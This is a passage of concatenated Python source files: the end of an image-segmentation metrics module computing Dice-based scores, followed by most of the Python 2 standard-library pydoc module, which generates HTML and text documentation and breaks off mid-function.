(gt == gt_idx).astype('uint8') dices = [] for pred_idx in seg_labels: _pred_seg = (seg == pred_idx).astype('uint8') dice = dice_score(_gt_seg, _pred_seg) dices.append(dice) best_dice = np.max(dices) best_dices.append(best_dice) workers = [] for gt_idx in gt_lables: worker = threading.Thread(target=dice, args=(gt_idx,)) worker.start() workers.append(worker) for worker in workers: worker.join() return np.mean(best_dices) def symmetric_best_dice(gt, seg): bd1 = best_dice(gt, seg) bd2 = best_dice(seg, gt) return min(bd1, bd2) class SBD: def __call__(self, gt, seg): return symmetric_best_dice(gt, seg) class DiC: def __call__(self, gt, seg): return dic(gt, seg) if __name__ == "__main__": metric = AveragePrecision() cluster_metrics = ClusterMetrics() y_true = np.zeros((100,100), np.uint16) y_true[10:20,10:20] = 1 y_pred = np.roll(y_true, 10, axis = 0) * 2 score = metric(y_pred, y_true) cluster_metrics(y_pred, y_true) cl_scores = cluster_metrics.dump() print(score) print(*cl_scores)
pydoc.py
#!/usr/bin/env python # -*- coding: latin-1 -*- """Generate Python documentation in HTML or text for interactive use. In the Python interpreter, do "from pydoc import help" to provide online help. Calling help(thing) on a Python object documents the object. Or, at the shell command line outside of Python: Run "pydoc <name>" to show documentation on something. <name> may be the name of a function, module, package, or a dotted reference to a class or function within a module or module in a package. If the argument contains a path segment delimiter (e.g. slash on Unix, backslash on Windows) it is treated as the path to a Python source file. Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines of all available modules. Run "pydoc -p <port>" to start an HTTP server on a given port on the local machine to generate documentation web pages. For platforms without a command line, "pydoc -g" starts the HTTP server and also pops up a little window for controlling it. Run "pydoc -w <name>" to write out the HTML documentation for a module to a file named "<name>.html". Module docs for core modules are assumed to be in http://docs.python.org/library/ This can be overridden by setting the PYTHONDOCS environment variable to a different URL or to a local directory containing the Library Reference Manual pages. """ __author__ = "Ka-Ping Yee <ping@lfw.org>" __date__ = "26 February 2001" __version__ = "$Revision: 88564 $" __credits__ = """Guido van Rossum, for an excellent programming language. Tommy Burnette, the original creator of manpy. Paul Prescod, for all his work on onlinehelp. Richard Chamberlain, for the first implementation of textdoc. """ # Known bugs that can't be fixed here: # - imp.load_module() cannot be prevented from clobbering existing # loaded modules, so calling synopsis() on a binary module file # changes the contents of any existing module with the same name. # - If the __file__ attribute on a module is a relative path and # the current directory is changed with os.chdir(), an incorrect # path will be displayed. import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings from repr import Repr from string import expandtabs, find, join, lower, split, strip, rfind, rstrip from traceback import extract_tb try: from collections import deque except ImportError: # Python 2.3 compatibility class deque(list): def popleft(self): return self.pop(0) # --------------------------------------------------------- common routines def pathdirs(): """Convert sys.path into a list of absolute, existing, unique paths.""" dirs = [] normdirs = [] for dir in sys.path: dir = os.path.abspath(dir or '.') normdir = os.path.normcase(dir) if normdir not in normdirs and os.path.isdir(dir): dirs.append(dir) normdirs.append(normdir) return dirs def getdoc(object): """Get the doc string or comments for an object.""" result = inspect.getdoc(object) or inspect.getcomments(object) result = _encode(result) return result and re.sub('^ *\n', '', rstrip(result)) or '' def splitdoc(doc): """Split a doc string into a synopsis line (if any) and the rest.""" lines = split(strip(doc), '\n') if len(lines) == 1: return lines[0], '' elif len(lines) >= 2 and not rstrip(lines[1]): return lines[0], join(lines[2:], '\n') return '', join(lines, '\n') def classname(object, modname): """Get a class name and qualify it with a module name if necessary.""" name = object.__name__ if object.__module__ != modname: name = object.__module__ + '.' 
+ name return name def isdata(object): """Check if an object is of a type that probably means it's data.""" return not (inspect.ismodule(object) or inspect.isclass(object) or inspect.isroutine(object) or inspect.isframe(object) or inspect.istraceback(object) or inspect.iscode(object)) def replace(text, *pairs): """Do a series of global replacements on a string.""" while pairs: text = join(split(text, pairs[0]), pairs[1]) pairs = pairs[2:] return text def cram(text, maxlen): """Omit part of a string if needed to make it fit in a maximum length.""" if len(text) > maxlen: pre = max(0, (maxlen-3)//2) post = max(0, maxlen-3-pre) return text[:pre] + '...' + text[len(text)-post:] return text _re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE) def stripid(text): """Remove the hexadecimal id from a Python object representation.""" # The behaviour of %p is implementation-dependent in terms of case. return _re_stripid.sub(r'\1', text) def _is_some_method(obj): return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj) def allmethods(cl): methods = {} for key, value in inspect.getmembers(cl, _is_some_method): methods[key] = 1 for base in cl.__bases__: methods.update(allmethods(base)) # all your base are belong to us for key in methods.keys(): methods[key] = getattr(cl, key) return methods def _split_list(s, predicate): """Split sequence s via predicate, and return pair ([true], [false]). The return value is a 2-tuple of lists, ([x for x in s if predicate(x)], [x for x in s if not predicate(x)]) """ yes = [] no = [] for x in s: if predicate(x): yes.append(x) else: no.append(x) return yes, no def visiblename(name, all=None, obj=None): """Decide whether to show documentation on a variable.""" # Certain special names are redundant. _hidden_names = ('__builtins__', '__doc__', '__file__', '__path__', '__module__', '__name__', '__slots__', '__package__') if name in _hidden_names: return 0 # Private names are hidden, but special names are displayed. if name.startswith('__') and name.endswith('__'): return 1 # Namedtuples have public fields and methods with a single leading underscore if name.startswith('_') and hasattr(obj, '_fields'): return 1 if all is not None: # only document that which the programmer exported in __all__ return name in all else: return not name.startswith('_') def classify_class_attrs(object): """Wrap inspect.classify_class_attrs, with fixup for data descriptors.""" def fixup(data): name, kind, cls, value = data if inspect.isdatadescriptor(value): kind = 'data descriptor' return name, kind, cls, value return map(fixup, inspect.classify_class_attrs(object)) # ----------------------------------------------------- Unicode support helpers try: _unicode = unicode except NameError: # If Python is built without Unicode support, the unicode type # will not exist. Fake one that nothing will match, and make # the _encode function that do nothing. class _unicode(object): pass _encoding = 'ascii' def _encode(text, encoding='ascii'): return text else: import locale _encoding = locale.getpreferredencoding() def _encode(text, encoding=None): if isinstance(text, unicode): return text.encode(encoding or _encoding, 'xmlcharrefreplace') else: return text def _binstr(obj): # Ensure that we have an encoded (binary) string representation of obj, # even if it is a unicode string. 
if isinstance(obj, _unicode): return obj.encode(_encoding, 'xmlcharrefreplace') return str(obj) # ----------------------------------------------------- module manipulation def ispackage(path): """Guess whether a path refers to a package directory.""" if os.path.isdir(path): for ext in ('.py', '.pyc', '.pyo'): if os.path.isfile(os.path.join(path, '__init__' + ext)): return True return False def source_synopsis(file): line = file.readline() while line[:1] == '#' or not strip(line): line = file.readline() if not line: break line = strip(line) if line[:4] == 'r"""': line = line[1:] if line[:3] == '"""': line = line[3:] if line[-1:] == '\\': line = line[:-1] while not strip(line): line = file.readline() if not line: break result = strip(split(line, '"""')[0]) else: result = None return result def synopsis(filename, cache={}): """Get the one-line summary out of a module file.""" mtime = os.stat(filename).st_mtime lastupdate, result = cache.get(filename, (None, None)) if lastupdate is None or lastupdate < mtime: info = inspect.getmoduleinfo(filename) try: file = open(filename) except IOError: # module can't be opened, so skip it return None if info and 'b' in info[2]: # binary modules have to be imported try: module = imp.load_module('__temp__', file, filename, info[1:]) except: return None result = (module.__doc__ or '').splitlines()[0] del sys.modules['__temp__'] else: # text modules can be directly examined result = source_synopsis(file) file.close() cache[filename] = (mtime, result) return result class ErrorDuringImport(Exception): """Errors that occurred while trying to import something to document it.""" def __init__(self, filename, exc_info): exc, value, tb = exc_info self.filename = filename self.exc = exc self.value = value self.tb = tb def __str__(self): exc = self.exc if type(exc) is types.ClassType: exc = exc.__name__ return 'problem in %s - %s: %s' % (self.filename, exc, self.value) def importfile(path): """Import a Python source file or compiled file given its path.""" magic = imp.get_magic() file = open(path, 'r') if file.read(len(magic)) == magic: kind = imp.PY_COMPILED else: kind = imp.PY_SOURCE file.close() filename = os.path.basename(path) name, ext = os.path.splitext(filename) file = open(path, 'r') try: module = imp.load_module(name, file, path, (ext, 'r', kind)) except: raise ErrorDuringImport(path, sys.exc_info()) file.close() return module def safeimport(path, forceload=0, cache={}): """Import a module; handle errors; return None if the module isn't found. If the module *is* found but an exception occurs, it's wrapped in an ErrorDuringImport exception and reraised. Unlike __import__, if a package path is specified, the module at the end of the path is returned, not the package at the beginning. If the optional 'forceload' argument is 1, we reload the module from disk (unless it's a dynamic extension).""" try: # If forceload is 1 and the module has been previously loaded from # disk, we always have to reload the module. Checking the file's # mtime isn't good enough (e.g. the module could contain a class # that inherits from another module that has changed). if forceload and path in sys.modules: if path not in sys.builtin_module_names: # Avoid simply calling reload() because it leaves names in # the currently loaded module lying around if they're not # defined in the new source file. Instead, remove the # module from sys.modules and re-import. Also remove any # submodules because they won't appear in the newly loaded # module's namespace if they're already in sys.modules. 
subs = [m for m in sys.modules if m.startswith(path + '.')] for key in [path] + subs: # Prevent garbage collection. cache[key] = sys.modules[key] del sys.modules[key] module = __import__(path) except: # Did the error occur before or after the module was found? (exc, value, tb) = info = sys.exc_info() if path in sys.modules: # An error occurred while executing the imported module. raise ErrorDuringImport(sys.modules[path].__file__, info) elif exc is SyntaxError: # A SyntaxError occurred before we could execute the module. raise ErrorDuringImport(value.filename, info) elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport': # The import error occurred directly in this function, # which means there is no such module in the path. return None else: # Some other error occurred during the importing process. raise ErrorDuringImport(path, sys.exc_info()) for part in split(path, '.')[1:]: try: module = getattr(module, part) except AttributeError: return None return module # ---------------------------------------------------- formatter base class class Doc: def document(self, object, name=None, *args): """Generate documentation for an object.""" args = (object, name) + args # 'try' clause is to attempt to handle the possibility that inspect # identifies something in a way that pydoc itself has issues handling; # think 'super' and how it is a descriptor (which raises the exception # by lacking a __name__ attribute) and an instance. if inspect.isgetsetdescriptor(object): return self.docdata(*args) if inspect.ismemberdescriptor(object): return self.docdata(*args) try: if inspect.ismodule(object): return self.docmodule(*args) if inspect.isclass(object): return self.docclass(*args) if inspect.isroutine(object): return self.docroutine(*args) except AttributeError: pass if isinstance(object, property): return self.docproperty(*args) return self.docother(*args) def fail(self, object, name=None, *args): """Raise an exception for unimplemented types.""" message = "don't know how to document object%s of type %s" % ( name and ' ' + repr(name), type(object).__name__) raise TypeError, message docmodule = docclass = docroutine = docother = docproperty = docdata = fail def getdocloc(self, object): """Return the location of module docs or None""" try: file = inspect.getabsfile(object) except TypeError: file = '(built-in)' docloc = os.environ.get("PYTHONDOCS", "http://docs.python.org/library") basedir = os.path.join(sys.exec_prefix, "lib", "python"+sys.version[0:3]) if (isinstance(object, type(os)) and (object.__name__ in ('errno', 'exceptions', 'gc', 'imp', 'marshal', 'posix', 'signal', 'sys', 'thread', 'zipimport') or (file.startswith(basedir) and not file.startswith(os.path.join(basedir, 'site-packages')))) and object.__name__ not in ('xml.etree', 'test.pydoc_mod')): if docloc.startswith("http://"): docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__) else: docloc = os.path.join(docloc, object.__name__ + ".html") else: docloc = None return docloc # -------------------------------------------- HTML documentation generator class HTMLRepr(Repr): """Class for safely making an HTML representation of a Python object.""" def __init__(self): Repr.__init__(self) self.maxlist = self.maxtuple = 20 self.maxdict = 10 self.maxstring = self.maxother = 100 def escape(self, text): return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;') def repr(self, object): return Repr.repr(self, object) def repr1(self, x, level): if hasattr(type(x), '__name__'): methodname = 'repr_' + join(split(type(x).__name__), '_') if 
hasattr(self, methodname): return getattr(self, methodname)(x, level) return self.escape(cram(stripid(repr(x)), self.maxother)) def repr_string(self, x, level): test = cram(x, self.maxstring) testrepr = repr(test) if '\\' in test and '\\' not in replace(testrepr, r'\\', ''): # Backslashes are only literal in the string and are never # needed to make any special characters, so show a raw string. return 'r' + testrepr[0] + self.escape(test) + testrepr[0] return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)', r'<font color="#c040c0">\1</font>', self.escape(testrepr)) repr_str = repr_string def repr_instance(self, x, level): try: return self.escape(cram(stripid(repr(x)), self.maxstring)) except: return self.escape('<%s instance>' % x.__class__.__name__) repr_unicode = repr_string class HTMLDoc(Doc): """Formatter class for HTML documentation.""" # ------------------------------------------- HTML formatting utilities _repr_instance = HTMLRepr() repr = _repr_instance.repr escape = _repr_instance.escape def page(self, title, contents): """Format an HTML page.""" return _encode(''' <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Python: %s</title> <meta charset="utf-8"> </head><body bgcolor="#f0f0f8"> %s </body></html>''' % (title, contents), 'ascii') def heading(self, title, fgcol, bgcol, extras=''): """Format a page heading.""" return ''' <table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading"> <tr bgcolor="%s"> <td valign=bottom>&nbsp;<br> <font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td ><td align=right valign=bottom ><font color="%s" face="helvetica, arial">%s</font></td></tr></table> ''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;') def section(self, title, fgcol, bgcol, contents, width=6, prelude='', marginalia=None, gap='&nbsp;'): """Format a section with a heading.""" if marginalia is None: marginalia = '<tt>' + '&nbsp;' * width + '</tt>' result = '''<p> <table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section"> <tr bgcolor="%s"> <td colspan=3 valign=bottom>&nbsp;<br> <font color="%s" face="helvetica, arial">%s</font></td></tr> ''' % (bgcol, fgcol, title) if prelude: result = result + ''' <tr bgcolor="%s"><td rowspan=2>%s</td> <td colspan=2>%s</td></tr> <tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap) else: result = result + ''' <tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap) return result + '\n<td width="100%%">%s</td></tr></table>' % contents def bigsection(self, title, *args): """Format a section with a big heading.""" title = '<big><strong>%s</strong></big>' % title return self.section(title, *args) def preformat(self, text): """Format literal preformatted text.""" text = self.escape(expandtabs(text)) return replace(text, '\n\n', '\n \n', '\n\n', '\n \n', ' ', '&nbsp;', '\n', '<br>\n') def multicolumn(self, list, format, cols=4): """Format a list of items into a multi-column list.""" result = '' rows = (len(list)+cols-1)//cols for col in range(cols): result = result + '<td width="%d%%" valign=top>' % (100//cols) for i in range(rows*col, rows*col+rows): if i < len(list): result = result + format(list[i]) + '<br>\n' result = result + '</td>' return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result def grey(self, text): return '<font color="#909090">%s</font>' % text def namelink(self, name, *dicts): """Make a link for an identifier, given name-to-URL mappings.""" for dict in dicts: if name in dict: return '<a href="%s">%s</a>' % (dict[name], 
name) return name def classlink(self, object, modname): """Make a link for a class.""" name, module = object.__name__, sys.modules.get(object.__module__) if hasattr(module, name) and getattr(module, name) is object: return '<a href="%s.html#%s">%s</a>' % ( module.__name__, name, classname(object, modname)) return classname(object, modname) def modulelink(self, object): """Make a link for a module.""" return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__) def modpkglink(self, data): """Make a link for a module or package to display in an index.""" name, path, ispackage, shadowed = data if shadowed: return self.grey(name) if path: url = '%s.%s.html' % (path, name) else: url = '%s.html' % name if ispackage: text = '<strong>%s</strong>&nbsp;(package)' % name else: text = name return '<a href="%s">%s</a>' % (url, text) def markup(self, text, escape=None, funcs={}, classes={}, methods={}): """Mark up some plain text, given a context of symbols to look for. Each context dictionary maps object names to anchor names.""" escape = escape or self.escape results = [] here = 0 pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|' r'RFC[- ]?(\d+)|' r'PEP[- ]?(\d+)|' r'(self\.)?(\w+))') while True: match = pattern.search(text, here) if not match: break start, end = match.span() results.append(escape(text[here:start])) all, scheme, rfc, pep, selfdot, name = match.groups() if scheme: url = escape(all).replace('"', '&quot;') results.append('<a href="%s">%s</a>' % (url, url)) elif rfc: url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc) results.append('<a href="%s">%s</a>' % (url, escape(all))) elif pep: url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep) results.append('<a href="%s">%s</a>' % (url, escape(all))) elif selfdot: # Create a link for methods like 'self.method(...)' # and use <strong> for attributes like 'self.attr' if text[end:end+1] == '(': results.append('self.' 
+ self.namelink(name, methods)) else: results.append('self.<strong>%s</strong>' % name) elif text[end:end+1] == '(': results.append(self.namelink(name, methods, funcs, classes)) else: results.append(self.namelink(name, classes)) here = end results.append(escape(text[here:])) return join(results, '') # ---------------------------------------------- type-specific routines def formattree(self, tree, modname, parent=None): """Produce HTML for a class tree as given by inspect.getclasstree().""" result = '' for entry in tree: if type(entry) is type(()): c, bases = entry result = result + '<dt><font face="helvetica, arial">' result = result + self.classlink(c, modname) if bases and bases != (parent,): parents = [] for base in bases: parents.append(self.classlink(base, modname)) result = result + '(' + join(parents, ', ') + ')' result = result + '\n</font></dt>' elif type(entry) is type([]): result = result + '<dd>\n%s</dd>\n' % self.formattree( entry, modname, c) return '<dl>\n%s</dl>\n' % result def docmodule(self, object, name=None, mod=None, *ignored): """Produce HTML documentation for a module object.""" name = object.__name__ # ignore the passed-in name try: all = object.__all__ except AttributeError: all = None parts = split(name, '.') links = [] for i in range(len(parts)-1): links.append( '<a href="%s.html"><font color="#ffffff">%s</font></a>' % (join(parts[:i+1], '.'), parts[i])) linkedname = join(links + parts[-1:], '.') head = '<big><big><strong>%s</strong></big></big>' % linkedname try: path = inspect.getabsfile(object) url = path if sys.platform == 'win32': import nturl2path url = nturl2path.pathname2url(path) filelink = '<a href="file:%s">%s</a>' % (url, path) except TypeError: filelink = '(built-in)' info = [] if hasattr(object, '__version__'): version = _binstr(object.__version__) if version[:11] == '$' + 'Revision: ' and version[-1:] == '$': version = strip(version[11:-1]) info.append('version %s' % self.escape(version)) if hasattr(object, '__date__'): info.append(self.escape(_binstr(object.__date__))) if info: head = head + ' (%s)' % join(info, ', ') docloc = self.getdocloc(object) if docloc is not None: docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals() else: docloc = '' result = self.heading( head, '#ffffff', '#7799ee', '<a href=".">index</a><br>' + filelink + docloc) modules = inspect.getmembers(object, inspect.ismodule) classes, cdict = [], {} for key, value in inspect.getmembers(object, inspect.isclass): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or (inspect.getmodule(value) or object) is object): if visiblename(key, all, object): classes.append((key, value)) cdict[key] = cdict[value] = '#' + key for key, value in classes: for base in value.__bases__: key, modname = base.__name__, base.__module__ module = sys.modules.get(modname) if modname != name and module and hasattr(module, key): if getattr(module, key) is base: if not key in cdict: cdict[key] = cdict[base] = modname + '.html#' + key funcs, fdict = [], {} for key, value in inspect.getmembers(object, inspect.isroutine): # if __all__ exists, believe it. Otherwise use old heuristic. 
if (all is not None or inspect.isbuiltin(value) or inspect.getmodule(value) is object): if visiblename(key, all, object): funcs.append((key, value)) fdict[key] = '#-' + key if inspect.isfunction(value): fdict[value] = fdict[key] data = [] for key, value in inspect.getmembers(object, isdata): if visiblename(key, all, object): data.append((key, value)) doc = self.markup(getdoc(object), self.preformat, fdict, cdict) doc = doc and '<tt>%s</tt>' % doc result = result + '<p>%s</p>\n' % doc if hasattr(object, '__path__'): modpkgs = [] for importer, modname, ispkg in pkgutil.iter_modules(object.__path__): modpkgs.append((modname, name, ispkg, 0)) modpkgs.sort() contents = self.multicolumn(modpkgs, self.modpkglink) result = result + self.bigsection( 'Package Contents', '#ffffff', '#aa55cc', contents) elif modules: contents = self.multicolumn( modules, lambda key_value, s=self: s.modulelink(key_value[1])) result = result + self.bigsection( 'Modules', '#ffffff', '#aa55cc', contents) if classes: classlist = map(lambda key_value: key_value[1], classes) contents = [ self.formattree(inspect.getclasstree(classlist, 1), name)] for key, value in classes: contents.append(self.document(value, key, name, fdict, cdict)) result = result + self.bigsection( 'Classes', '#ffffff', '#ee77aa', join(contents)) if funcs: contents = [] for key, value in funcs: contents.append(self.document(value, key, name, fdict, cdict)) result = result + self.bigsection( 'Functions', '#ffffff', '#eeaa77', join(contents)) if data: contents = [] for key, value in data: contents.append(self.document(value, key)) result = result + self.bigsection( 'Data', '#ffffff', '#55aa55', join(contents, '<br>\n')) if hasattr(object, '__author__'): contents = self.markup(_binstr(object.__author__), self.preformat) result = result + self.bigsection( 'Author', '#ffffff', '#7799ee', contents) if hasattr(object, '__credits__'): contents = self.markup(_binstr(object.__credits__), self.preformat) result = result + self.bigsection( 'Credits', '#ffffff', '#7799ee', contents) return result def docclass(self, object, name=None, mod=None, funcs={}, classes={}, *ignored): """Produce HTML documentation for a class object.""" realname = object.__name__ name = name or realname bases = object.__bases__ contents = [] push = contents.append # Cute little class to pump out a horizontal rule between sections. class HorizontalRule: def __init__(self): self.needone = 0 def maybe(self): if self.needone: push('<hr>\n') self.needone = 1 hr = HorizontalRule() # List the mro, if non-trivial. mro = deque(inspect.getmro(object)) if len(mro) > 2: hr.maybe() push('<dl><dt>Method resolution order:</dt>\n') for base in mro: push('<dd>%s</dd>\n' % self.classlink(base, object.__module__)) push('</dl>\n') def spill(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. 
# (bug #1785) push(self._docdescriptor(name, value, mod)) else: push(self.document(value, name, mod, funcs, classes, mdict, object)) push('\n') return attrs def spilldescriptors(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: push(self._docdescriptor(name, value, mod)) return attrs def spilldata(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: base = self.docother(getattr(object, name), name, mod) if (hasattr(value, '__call__') or inspect.isdatadescriptor(value)): doc = getattr(value, "__doc__", None) else: doc = None if doc is None: push('<dl><dt>%s</dl>\n' % base) else: doc = self.markup(getdoc(value), self.preformat, funcs, classes, mdict) doc = '<dd><tt>%s</tt>' % doc push('<dl><dt>%s%s</dl>\n' % (base, doc)) push('\n') return attrs attrs = filter(lambda data: visiblename(data[0], obj=object), classify_class_attrs(object)) mdict = {} for key, kind, homecls, value in attrs: mdict[key] = anchor = '#' + name + '-' + key try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. # (bug #1785) pass try: # The value may not be hashable (e.g., a data attr with # a dict or list value). mdict[value] = anchor except TypeError: pass while attrs: if mro: thisclass = mro.popleft() else: thisclass = attrs[0][2] attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass) if thisclass is __builtin__.object: attrs = inherited continue elif thisclass is object: tag = 'defined here' else: tag = 'inherited from %s' % self.classlink(thisclass, object.__module__) tag += ':<br>\n' # Sort attrs by name. try: attrs.sort(key=lambda t: t[0]) except TypeError: attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat # Pump out the attrs, segregated by kind. 
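            # Note (descriptive, not from the original source): each remaining entry
            # is the (name, kind, defining_class, value) tuple produced by
            # classify_class_attrs() earlier in this module. t[2] (the defining
            # class) was already used above to split this class's own attributes
            # from the inherited remainder; the lambdas below partition what is
            # left by t[1] (the kind), emitting one documented section per kind
            # in a fixed order.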
attrs = spill('Methods %s' % tag, attrs, lambda t: t[1] == 'method') attrs = spill('Class methods %s' % tag, attrs, lambda t: t[1] == 'class method') attrs = spill('Static methods %s' % tag, attrs, lambda t: t[1] == 'static method') attrs = spilldescriptors('Data descriptors %s' % tag, attrs, lambda t: t[1] == 'data descriptor') attrs = spilldata('Data and other attributes %s' % tag, attrs, lambda t: t[1] == 'data') assert attrs == [] attrs = inherited contents = ''.join(contents) if name == realname: title = '<a name="%s">class <strong>%s</strong></a>' % ( name, realname) else: title = '<strong>%s</strong> = <a name="%s">class %s</a>' % ( name, name, realname) if bases: parents = [] for base in bases: parents.append(self.classlink(base, object.__module__)) title = title + '(%s)' % join(parents, ', ') doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict) doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc return self.section(title, '#000000', '#ffc8d8', contents, 3, doc) def formatvalue(self, object): """Format an argument default value as text.""" return self.grey('=' + self.repr(object)) def docroutine(self, object, name=None, mod=None, funcs={}, classes={}, methods={}, cl=None): """Produce HTML documentation for a function or method object.""" realname = object.__name__ name = name or realname anchor = (cl and cl.__name__ or '') + '-' + name note = '' skipdocs = 0 if inspect.ismethod(object): imclass = object.im_class if cl: if imclass is not cl: note = ' from ' + self.classlink(imclass, mod) else: if object.im_self is not None: note = ' method of %s instance' % self.classlink( object.im_self.__class__, mod) else: note = ' unbound %s method' % self.classlink(imclass,mod) object = object.im_func if name == realname: title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname) else: if (cl and realname in cl.__dict__ and cl.__dict__[realname] is object): reallink = '<a href="#%s">%s</a>' % ( cl.__name__ + '-' + realname, realname) skipdocs = 1 else: reallink = realname title = '<a name="%s"><strong>%s</strong></a> = %s' % ( anchor, name, reallink) if inspect.isfunction(object): args, varargs, varkw, defaults = inspect.getargspec(object) argspec = inspect.formatargspec( args, varargs, varkw, defaults, formatvalue=self.formatvalue) if realname == '<lambda>': title = '<strong>%s</strong> <em>lambda</em> ' % name argspec = argspec[1:-1] # remove parentheses else: argspec = '(...)' decl = title + argspec + (note and self.grey( '<font face="helvetica, arial">%s</font>' % note)) if skipdocs: return '<dl><dt>%s</dt></dl>\n' % decl else: doc = self.markup( getdoc(object), self.preformat, funcs, classes, methods) doc = doc and '<dd><tt>%s</tt></dd>' % doc return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc) def _docdescriptor(self, name, value, mod): results = [] push = results.append if name: push('<dl><dt><strong>%s</strong></dt>\n' % name) if value.__doc__ is not None: doc = self.markup(getdoc(value), self.preformat) push('<dd><tt>%s</tt></dd>\n' % doc) push('</dl>\n') return ''.join(results) def docproperty(self, object, name=None, mod=None, cl=None): """Produce html documentation for a property.""" return self._docdescriptor(name, object, mod) def docother(self, object, name=None, mod=None, *ignored): """Produce HTML documentation for a data object.""" lhs = name and '<strong>%s</strong> = ' % name or '' return lhs + self.repr(object) def docdata(self, object, name=None, mod=None, cl=None): """Produce html documentation for a data descriptor.""" return self._docdescriptor(name, 
object, mod) def index(self, dir, shadowed=None): """Generate an HTML index for a directory of modules.""" modpkgs = [] if shadowed is None: shadowed = {} for importer, name, ispkg in pkgutil.iter_modules([dir]): modpkgs.append((name, '', ispkg, name in shadowed)) shadowed[name] = 1 modpkgs.sort() contents = self.multicolumn(modpkgs, self.modpkglink) return self.bigsection(dir, '#ffffff', '#ee77aa', contents) # -------------------------------------------- text documentation generator class TextRepr(Repr): """Class for safely making a text representation of a Python object.""" def __init__(self): Repr.__init__(self) self.maxlist = self.maxtuple = 20 self.maxdict = 10 self.maxstring = self.maxother = 100 def repr1(self, x, level): if hasattr(type(x), '__name__'): methodname = 'repr_' + join(split(type(x).__name__), '_') if hasattr(self, methodname): return getattr(self, methodname)(x, level) return cram(stripid(repr(x)), self.maxother) def repr_string(self, x, level): test = cram(x, self.maxstring) testrepr = repr(test) if '\\' in test and '\\' not in replace(testrepr, r'\\', ''): # Backslashes are only literal in the string and are never # needed to make any special characters, so show a raw string. return 'r' + testrepr[0] + test + testrepr[0] return testrepr repr_str = repr_string def repr_instance(self, x, level): try: return cram(stripid(repr(x)), self.maxstring) except: return '<%s instance>' % x.__class__.__name__ class TextDoc(Doc): """Formatter class for text documentation.""" # ------------------------------------------- text formatting utilities _repr_instance = TextRepr() repr = _repr_instance.repr def bold(self, text): """Format a string in bold by overstriking.""" return join(map(lambda ch: ch + '\b' + ch, text), '') def indent(self, text, prefix=' '): """Indent text by prepending a given prefix to each line.""" if not text: return '' lines = split(text, '\n') lines = map(lambda line, prefix=prefix: prefix + line, lines) if lines: lines[-1] = rstrip(lines[-1]) return join(lines, '\n') def section(self, title, contents): """Format a section with a given heading.""" return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n' # ---------------------------------------------- type-specific routines def formattree(self, tree, modname, parent=None, prefix=''): """Render in text a class tree as returned by inspect.getclasstree().""" result = '' for entry in tree: if type(entry) is type(()): c, bases = entry result = result + prefix + classname(c, modname) if bases and bases != (parent,): parents = map(lambda c, m=modname: classname(c, m), bases) result = result + '(%s)' % join(parents, ', ') result = result + '\n' elif type(entry) is type([]): result = result + self.formattree( entry, modname, c, prefix + ' ') return result def docmodule(self, object, name=None, mod=None): """Produce text documentation for a given module object.""" name = object.__name__ # ignore the passed-in name synop, desc = splitdoc(getdoc(object)) result = self.section('NAME', name + (synop and ' - ' + synop)) try: all = object.__all__ except AttributeError: all = None try: file = inspect.getabsfile(object) except TypeError: file = '(built-in)' result = result + self.section('FILE', file) docloc = self.getdocloc(object) if docloc is not None: result = result + self.section('MODULE DOCS', docloc) if desc: result = result + self.section('DESCRIPTION', desc) classes = [] for key, value in inspect.getmembers(object, inspect.isclass): # if __all__ exists, believe it. Otherwise use old heuristic. 
if (all is not None or (inspect.getmodule(value) or object) is object): if visiblename(key, all, object): classes.append((key, value)) funcs = [] for key, value in inspect.getmembers(object, inspect.isroutine): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or inspect.isbuiltin(value) or inspect.getmodule(value) is object): if visiblename(key, all, object): funcs.append((key, value)) data = [] for key, value in inspect.getmembers(object, isdata): if visiblename(key, all, object): data.append((key, value)) modpkgs = [] modpkgs_names = set() if hasattr(object, '__path__'): for importer, modname, ispkg in pkgutil.iter_modules(object.__path__): modpkgs_names.add(modname) if ispkg: modpkgs.append(modname + ' (package)') else: modpkgs.append(modname) modpkgs.sort() result = result + self.section( 'PACKAGE CONTENTS', join(modpkgs, '\n')) # Detect submodules as sometimes created by C extensions submodules = [] for key, value in inspect.getmembers(object, inspect.ismodule): if value.__name__.startswith(name + '.') and key not in modpkgs_names: submodules.append(key) if submodules: submodules.sort() result = result + self.section( 'SUBMODULES', join(submodules, '\n')) if classes: classlist = map(lambda key_value: key_value[1], classes) contents = [self.formattree( inspect.getclasstree(classlist, 1), name)] for 